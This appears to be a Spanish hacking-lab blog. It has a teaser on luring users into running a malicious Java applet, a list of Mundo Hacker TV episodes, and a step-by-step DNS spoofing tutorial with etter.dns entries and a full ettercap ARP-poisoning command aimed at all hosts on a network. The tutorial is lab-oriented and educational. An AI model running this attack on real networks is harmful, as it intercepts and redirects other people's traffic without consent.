jueves, 22 de diciembre de 2011

[Others] JavaApplet

Conceptos básicos:

  • Applet :  Componente de una aplicación que se ejecuta en el contexto de otro programa, por ejemplo un navegador web.

  • Applet de Java : Es un  Applet escrito en Java. Los applets de Java pueden ejecutarse en un navegador web utilizando la Maquina virtual de java (JVM).

    Según la wikipedia:

    ...entre sus características podemos mencionar un esquema de seguridad que permite que los applets que se ejecutan en el equipo no tengan acceso a partes sensibles (por ej. no pueden escribir archivos)....

    ... a menos que uno mismo le dé los permisos necesarios en el sistema...
Si amigos ... cuantas veces le hemos dado al OK sin leer o simplemente nos hemos pasado por el forro las advertencias, pues este video se lo dedico a todas aquellas "Anitas las secretarias*" que hay por el mundo.



*persona lo abre y lo ejecuta todo aunque desconozca la procedencia 

Material necesario para realizar este laboratorio:
  • Maquina virtual: Windows XP SP3 (Maquina virtual de java instalada)
  • El Applet de Java ( lo podéis encontrar por la web o me lo podéis pedir ) 
  • Un ejecutable  ( vosotros mismos... )

martes, 1 de marzo de 2011

Mundo Hacker TV

Finalmente los amigos de Mundo Hacker dan el salto de la radio a la TV, a continuacion os dejo los tres primeros capitulos en los que podremos ver a Antonio, Jean Pol, Ruben,Yago y compañia en acción!

Episodio 1
Episodio 2
Episodio 3
Episodio 4
Episodio 5
Episodio 6
Episodio 7
Episodio 8
Episodio 9
Episodio 10
Episodio "Fantasma"




lunes, 31 de enero de 2011

[MiM] DNS spoofing

Conceptos básicos:

  • DNS (Domain Name System): Es una base de datos distribuida, con información que se usa para traducir los nombres de dominio, fáciles de recordar y usar por las personas, en números de protocolo de Internet (IP) que es la forma en la que las máquinas pueden encontrarse en Internet.
  • Spoofing:
    En términos de seguridad de redes hace referencia al uso de técnicas de suplantación de identidad generalmente con usos maliciosos o de investigación.
DNS Spoofing: ¿Que és? y ¿En qué consiste? 
Teniendo en cuenta los conceptos anteriores, una traduccion sencilla de DNS Spoofing seria: uplantación de identidad por nombre de dominio.
Consiste en el falseamiento de una relación "Nombre de dominio-IP" ante una consulta de resolución de nombre, es decir, resolver con una dirección IP falsa un cierto nombre DNS o viceversa.
Esto se consigue falseando las entradas de la relación Nombre de dominio-IP de un servidor DNS, mediante alguna vulnerabilidad del servidor en concreto o por su confianza hacia servidores poco fiables. Las entradas falseadas de un servidor DNS son susceptibles de infectar (envenenar) el caché DNS de otro servidor diferente (DNS Poisoning).
Para realizar este laboratorio utilitzaré Ettercap, ya que es multiplataforma y me permite realizar las pruebas tanto en Windows como en Linux


Podemos descargar las diferentes versiones de la suite de Etthercap desde la pagina web del proyecto http://ettercap.sourceforge.net/

Tenia intención de hacer el ejemplo tanto en linux como en windows pero debido al "inexistente" tiempo libre del que dispongo lo realizare sobre linu (que queda más friki pro)

Paso a paso (Linux)

  • Abrimos un shell y nos dirigimos a la ruta donde tenemos situado el pluging que utilizaremos para realizar este laboratorio, por defecto :
     
    cd /usr/share/ettercap/
  •  Ahora ahora editaremos el archivo etter.dns que será el archivo para configurar el plugin a nuestro gusto.

    nano etter.dns

  • Utilizremos la siguiente estructura:

    www.site.com   A   IP destino

    site.com            A   IP destino

    *site.com          A   IP destino


    Como se puede obserbar en la captura siguiente estoy redireccionando todas las peticiones DNS que se realizan a petardas.com a la ip de google.
    Para saber la ip de cualquier site web, tendremos suficiente que realizar un ping a ese site.



  • Bien, una vez ya tenemos editado el  archivo ya solo nos queda lanzar ettercap  (se puede lanzar de modo visual o en modo consola, en este caso lo lanzo en modo consola que es más friki molón.

    ettercap -T -q -i eth0 -P dns_spoof -M arp // //
     
    Parametros utilizados:


    -T  text mode
    
    
    -q  quiet
    
    
    -i  interface (en mi caso eth0)
    
    
    -P dns_spoof  plugin + el nombre del plugin (dns_spoof de ettercap)
    
    
    -M arp  ManInTheMiddle ARP
    
    
    // //  Todas las maquinas de la red





Material necesario para realizar este laboratorio:
  • Maquina virtual: Backtrack 4 
  • Maquina virtual: Windows XP SP3